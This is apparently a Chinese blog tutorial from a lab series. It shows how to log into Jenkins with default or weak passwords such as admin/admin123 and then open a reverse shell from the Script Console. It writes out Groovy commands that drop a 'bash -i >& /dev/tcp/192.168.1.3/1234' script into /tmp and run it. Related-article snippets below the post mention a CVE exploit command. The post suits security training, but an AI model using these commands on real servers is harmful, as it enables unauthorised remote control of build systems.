web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

最新推荐文章于 2024-07-20 18:16:53 发布
最新推荐文章于 2024-07-20 18:16:53 发布
阅读量479 收藏 2
点赞数 8
分类专栏: 0803实操-Web中间件漏洞 文章标签: 前端 jenkins servlet
我是Alsn,那半个橘子是海上遇到大雨时侯的明亮橘色灯塔!
本文链接:https://blog.csdn.net/Alsn86/article/details/139888888
版权

web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

Jenkins弱口令

默认用户一般为jenkins/jenkins
在这里插入图片描述
在这里插入图片描述
使用admin/admin123登陆成功
在这里插入图片描述

Jenkins反弹shell

在这里插入图片描述
在这里插入图片描述
格式为 println"命令".execute().text
在这里插入图片描述
在/tmp目录中生成shell.sh文件,并向其中写入反弹shell的语句
new File(“/tmp/shell.sh”).write(‘bash -i >& /dev/tcp/192.168.1.3/1234 0>&1’
在这里插入图片描述

println “ls-al/tmp/shell.sh”.execute().text
在这里插入图片描述
攻击机nc监听1234端口,使用sh命令执行服务器上的脚本进行反弹shell,println"sh/tmp/shell.sh".execute().text
在这里插入图片描述
在这里插入图片描述

Alsn86
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ansible-role-jenkins:Ansible角色-Jenkins CI
01-30
【Ansible角色-Jenkins CI详解】 Ansible是一个强大的自动化工具,用于配置管理、应用部署和任务执行。在持续集成(CI)和持续交付(CD)的流程中,Jenkins是广泛应用的开源自动化服务器。`ansible-role-jenkins`是...
漏洞分析|死磕Jenkins漏洞回显与利用效果_jenkins 漏洞
2401_84297265的博客
04-29 801
【代码】漏洞分析|死磕Jenkins漏洞回显与利用效果_jenkins 漏洞
Jenkins弱口令RCE复现渗透测试
kelenwait的博客
06-20 2793
简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成,Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。 漏洞复现 1.jenkins存在默认口令使用弱口令登录 admin/admin123 2.找到 Manage Jenkins -Tools and Actions - Script Console 点击
jenkins弱口令漏洞
WY92139010的博客
08-03 1419
jenkins弱口令漏洞 一、漏洞描述 通过暴力破解管理控制台,如果爆破成功,可获得后台管理权限。操作后台,后台可通过脚本命令行功能执行系统命令,如反弹shell等,低权限可以通过创建控制台输出方式执行命令。 二、漏洞环境搭建 1、 官方下载jenkins-2.50-1.1.noarch.rpm,下载地址: http://mirrors.jenkins.io 2、在redhat...
jenkins漏洞复现】CVE-2017-1000353远程代码执行漏洞+CVE-2018-1000861未授权弱口令用户可执行任意命令
serendipity1130的博客
08-31 949
CVE-2017-1000353 1.扫描开放了8080端口,访问8080端口: 2、执行下面命令,生成字节码文件: java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success" 3、执行上述代码后,生成jenkins_poc.ser文件,这就是序列化字符串,#"touch..."是待执行的任意命令 4、修改exploit.py,把proxies里面的内容注释掉 6、执行如下
Jenkins】未授权访问漏洞
qq_50854662的博客
07-08 1746
Jenkins】未授权访问漏洞
Jenkins弱口令RCE
weixin_44508748的博客
12-14 706
http://www.x.x.x.x:8080/script println 'id' .execute.text
sonar-scanner-jenkins.hpi
08-03
https://github.com/jenkinsci/sonarqube-plugin 自己也从github下载,编译
用代码描述流水线-JenkinsPipeline详解
01-27
自从Jenkins2.0版本升级之后,支持了通过代码(Groovy DSL)来描述一个构建流水线,灵活方便地实现持续交付,大大提升JenkinsJob维护的效率,实现从 CI到CD到转变。而在2016JenkinsWorld大会上,Jenkins发布了1.0...
ansible-jenkins
05-02
提升Vagrant测试环境要启动此测试环境,只需执行以下命令: cd Vagrantvagrant up 设置完成后,您就可以使用所选的浏览器连接到Jenkins WebUI并开始做一些有趣的事情。 注意:此设置是不安全的设置,未启用任何身份...
linter-jenkins:通过声明式Linter的Jenkinsfile皮棉
05-12
安装必须具有安装了jenkins-pipeline插件的Jenkins服务器,才能对其进行访问。 如果您的网络中没有一个可用的服务器,则建议使用Vagrant或Docker站起来一个便携式服务器实例,因为两者都可以正常工作。 还需要Linter...
Jenkins弱口令扫描器
weixin_34162629的博客
08-01 619
Jenkins是一个开源软件项目,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。 默认地Jenkins不包含任何的安全检查,如果未做好权限控制,可以通过其中一个未授权的命令执行获取服务器权限。当然如果配置了授权访问和资源访问权限设置,也可以批量抓取用户名进行暴力破解(有可能产生告警信息)。 由于Jenkins版本不同,因此抓取用户列表的CG...
jenkins后台执行shell命令
汇渊科技
09-09 7704
参考官网: https://wiki.jenkins.io/display/JENKINS/ProcessTreeKiller原理:启动的时候给命令,让jenkins不终结自己的进程衍生的进程。 java -Dhudson.util.ProcessTree.disable=true -jar jenkins.war 还有一种办法直接在shell(要后台执行命令前)加入:BUILD_ID=dontK
修改Jenkins密码
莫忘、初心
05-23 2万+
jenkins工作目录 找到Jenkins的工作目录 一般工作目录都在 /root/.jenkins 如果指定过jenkins的目录的话,使用命令行查找JENKINS_HOME环境变量 tomact目录/bin/catalina.sh /etc/profile 修改 config.xml 进入jenkins工作目录,找到config.xml配置文件 <useSecurity>...
忘记Jenkins管理员密码的解决办法
热门推荐
北极的冰箱
02-09 16万+
1.进入\Jenkins\secrets目录,打开initialAdminPassword文件,复制密码; 2.访问Jenkins页面,输入管理员admin,及刚才的密码; 3.进入后可更改其他管理员密码;
Jenkins远程命令执行漏洞(CVE-2018-1000861)
锋刃科技的博客
06-06 5557
1. 漏洞简介 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令 2. 影响组件 Jenkins 3. 漏洞指纹 Jenkins 4. Fofa Dork app="Jenkins" 5. 漏洞分析 这里我们是用docker快速搭建 git clone https://github.com/vulhub/vulhub.git cd /root/vulhub/jenkins/CVE-2018-1000861 docker-compose
jenkins默认密码重置
明确目标,明白做事,努力就有机会。
08-02 6057
Jenkins专有用户的数据存放在JENKINS_HOME/users目录。路径如图所示: 打开文件config.xml,找到&lt;passwordHash&gt;节点,如图: 可修改成加密串:#jbcrypt:$2a$10$DdaWzN64JgUtLdvxWIflcuQu2fgrrMSAMabF5TSrGK5nXitqK9ZMS 重启后密码及修改成功,为:111111  登录名a...
[应用漏洞]Jenkins
不忘初心,护天下安全!
08-09 525
漏洞又遇到了,暂且把待学习的文章写一下,等不及我消化的童鞋直接看链接吧: https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 ...
前端面试题日常练-day97 【Less】
最新发布
qq_44640575的博客
07-20 391
border-radius()函数用于在Less中生成圆形边框效果。通过设置border-radius()函数,我们可以为元素的边框添加圆角效果,使边框呈现圆形的外观,从而美化页面元素的边框样式。
ks-jenkins 升级
03-14
ks-jenkins是一个基于Jenkins的持续集成和持续交付平台,用于帮助开发团队实现自动化构建、测试和部署。升级ks-jenkins可以提供更好的性能、功能和安全性。 升级ks-jenkins的步骤如下: 1.备份数据:在升级之前,务必备份ks-jenkins的数据,包括配置文件、插件和构建历史等重要数据。 2.查看更新日志:在升级之前,查看ks-jenkins的更新日志,了解新版本的改进和修复的bug。 3.下载新版本:从官方网站或者其他可信的渠道下载最新版本的ks-jenkins。 4.停止服务:停止当前运行的ks-jenkins服务。 5.替换文件:将下载的新版本文件替换掉旧版本的文件,包括配置文件、插件和其他相关文件。 6.启动服务:启动新版本的ks-jenkins服务,并确保服务正常运行。 7.测试功能:测试新版本的ks-jenkins是否正常工作,包括构建、测试和部署等功能。 8.恢复数据:如果一切正常,可以将备份的数据恢复到新版本的ks-jenkins中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值